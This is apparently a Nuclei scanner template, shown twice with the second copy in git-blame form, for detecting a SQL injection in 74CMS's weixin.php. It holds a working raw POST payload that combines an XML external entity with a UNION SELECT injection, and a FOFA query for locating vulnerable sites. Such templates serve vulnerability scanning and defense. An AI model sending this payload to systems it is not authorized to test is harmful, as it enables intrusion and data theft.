nuclei-templates/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml

id: 74cms-weixin-sqli

info:
  name: 74CMS weixin.php - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
  reference:
    - https://cn-sec.com/archives/25900.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="骑士-74CMS"
  tags: 74cms,weixin,sqli
variables:
  num: '999999999'

http:
  - raw:
      - |
        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{num}})#</Content></xml>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950
Create 74cms-weixin-sqli.yaml 2023-08-22 06:45:54 +00:00			`id: 74cms-weixin-sqli`

			`info:`
			`name: 74CMS weixin.php - SQL Injection`
			`author: SleepingBag945`
			`severity: high`
			`description: \|`
			`There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.`
			`reference:`
			`- https://cn-sec.com/archives/25900.html`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
Create 74cms-weixin-sqli.yaml 2023-08-22 06:45:54 +00:00			`fofa-query: app="骑士-74CMS"`
			`tags: 74cms,weixin,sqli`
			`variables:`
			`num: '999999999'`

			`http:`
			`- raw:`
			`- \|`
			`POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce= HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml`

			`<?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{num}})#</Content></xml>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '{{md5(num)}}'`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Thu Oct 19 13:13:50 UTC 2023] :robot: 2023-10-19 13:13:52 +00:00			`# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950`